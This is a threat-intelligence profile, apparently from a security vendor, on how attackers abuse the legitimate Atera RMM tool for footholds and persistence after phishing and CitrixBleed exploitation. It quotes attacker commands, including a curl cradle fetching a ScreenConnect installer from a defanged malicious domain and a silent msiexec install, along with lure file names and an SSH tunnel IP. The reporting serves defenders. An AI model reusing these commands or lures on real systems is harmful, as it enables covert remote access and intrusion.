Atera
Atera is a legitimate cloud-based remote monitoring and management (RMM) platform that is repeatedly abused by threat actors as a remote access tool rather than malware developed by the actors themselves. Across the provided reporting, adversaries use Atera to establish and maintain footholds, execute remote and interactive PowerShell, transfer files, and persist in victim environments while blending in with normal IT activity through signed and trusted software.
Observed delivery and abuse patterns include renamed or trojanized installers and silent MSI-based deployment. Red Canary reported abuse involving renamed MSI installers such as MSTeam-installer.msi, and noted an intrusion where Atera was used to attempt installation of ScreenConnect via a curl-based cradle and then via Atera package management. CERT-UA described a phishing campaign targeting Ukrainian defense enterprises in which GLUEEGG and the DROPCLUE loader ultimately launched a BAT script that used curl.exe to download and silently install the legitimate ATERA agent with msiexec /i setup.msi /qn. FIN7 was reported to have staged legitimate software trojanized to contain an Atera agent installer on Amazon S3.
Atera has been observed in post-exploitation and ransomware-related activity. Mandiant observed deployment of Atera, AnyDesk, and SplashTop following successful exploitation of CitrixBleed / CVE-2023-4966 on NetScaler ADC and Gateway appliances to establish and maintain access. Reporting on LockBit activity stated operators deployed Atera after CitrixBleed exploitation to maintain persistence and enable remote, interactive PowerShell, including persistence after patching. NCC Group also observed Atera deployed as a secondary remote access and persistence mechanism during an Everest ransomware intrusion. Sophos reported abuse of the Atera agent during Log4Shell exploitation of VMware Horizon, alongside other payloads and backdoors.
Threat actors and clusters explicitly associated with Atera in the provided content include FIN7, LockBit operators, UAC-0180, TA450 historically, Iranian threat actors more broadly, and multiple uncategorized clusters tracked by Mandiant exploiting CVE-2023-4966. Proofpoint and Red Canary both highlighted broader cybercriminal adoption of Atera as part of a wider trend toward using legitimate RMM tools as first-stage payloads or persistence mechanisms.
Targeting mentioned in the content includes Ukrainian defense enterprises, organizations compromised through Citrix NetScaler exploitation across legal and professional services, technology, and government, and environments affected by ransomware or opportunistic exploitation. Defenders are specifically advised in the content to treat Atera-related infrastructure such as servicedesk.atera.com as suspicious when Atera is not authorized in the environment.
High-confidence artifacts and identifiers mentioned include renamed MSI installers such as MSTeam-installer.msi; silent installation via msiexec /i setup.msi /qn; AteraAgent.exe command-line parameters including agent-id, account-id, environment, customer-id, and folder-id; and example Atera-servicedesk URLs containing customerId, integratorLogin, and accountId parameters.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“Atera is a legitimate… remote monitoring and management tool… they install their own Atera agents…”
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
...TA450 historically using several RMM tools, such as Atera, PDQ Connect, ScreenConnect, and SimpleHelp...
FIN7 has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.
...завантаження і встановлення MSI-файлу легітимної програми для віддаленого управління ЕОМ ATERA...
Techniques & procedures
23 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
Resource Development
Initial Access
4 techniques
Initial Access
Instead of relying on malicious software that antivirus tools might catch and flag, they use legitimate remote access tools to blend in with normal IT activity.
The actor gained initial access through a phishing email directing the user to open a shared document hosted at hxxps[://]ws[.]onehub[.]com/files/ and download a file named ‘New Program ICC LTD.zip’.
Execution
3 techniques
Execution
Upon installing Atera Agent, the threat actors used Atera remote run commands to execute a PowerShell script (a.ps1) with the goal of dumping credentials and creating a backup file of the SYSTEM registry hive.
After which, the adversary first attempted a cradle (command line that downloads and installs a payload as a single command) to install ScreenConnect: cmd.exe /c mkdir C:\Temp 2>NUL & curl.exe -L hxxps[:]//server[.]rarexterna[.]top/Bin/ScreenConnect.ClientSetup[.]msi
Persistence
1 technique
Persistence
Stealth
3 techniques
Stealth
Post-compromise actions in Atera also included: ... An obfuscated PowerShell command used to download the Level RMM tool
Even when the file is renamed to something like party_invite.exe , or Voicemailaudioext.exe ... A common lure is themed as a Social Security statement ( ssa.msi ) ... using lures such as a document ( docmentfilecsm_jw98evavuqm5gb3.exe ) or an IRS tax-related file ( IRS-Statement_Pr2ui4J9cfA6YEu.exe ).
Credential Access
2 techniques
Credential Access
Discovery
2 techniques
Discovery
Lateral Movement
2 techniques
Lateral Movement
Over the last few years, threat actors have flocked to exploit legitimate remote monitoring and management (RMM) tools—blue-chip IT software like ScreenConnect, LogMeIn Resolve, and PDQ Connect—blurring the line between legitimate IT administration and malicious intrusion.
Command and Control
5 techniques
Command and Control
Post-compromise actions in Atera also included: ... An SSH tunnel towards 51.16.209[.]105
Post-compromise actions in Atera also included: ... An SSH tunnel towards 51.16.209[.]105;
The ‘New Program ICC LTD.zip’ archive contained a compressed installer file for legitimate remote monitoring and management (RMM) tool Atera.
Exfiltration
1 technique
Exfiltration
IOCs tracked for this family
9 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
12 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A cloud-based IT management platform abused through renamed MSI installers. Attackers use its package management and agent functionality to install and manage secondary payloads, notably ScreenConnect.
A legitimate remote monitoring and management tool abused by Iranian threat actors for persistence and lateral movement.
Legitimate RMM tool previously abused by TA450 for foothold/remote access in intrusions.
A legitimate RMM tool increasingly seen in malicious email campaigns as a first-stage payload for remote access and follow-on activity.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.